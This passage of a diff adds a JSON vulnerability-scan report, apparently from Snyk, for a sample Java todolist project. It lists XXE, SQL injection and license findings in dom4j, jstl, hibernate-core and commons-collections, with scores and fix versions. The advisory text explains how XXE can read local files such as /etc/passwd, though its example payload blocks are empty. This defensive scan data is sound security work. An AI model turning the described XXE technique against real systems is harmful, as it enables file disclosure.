"sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", + "type": "license", + "title": "CDDL-1.0 license", + "semver": { + "vulnerable": [ + "[1.2,)" + ] + }, + "license": "CDDL-1.0", + "language": "java", + "description": "CDDL-1.0 license", + "packageName": "javax.servlet:jstl", + "creationTime": "2024-06-18T08:06:13.191Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T08:06:13.191Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": 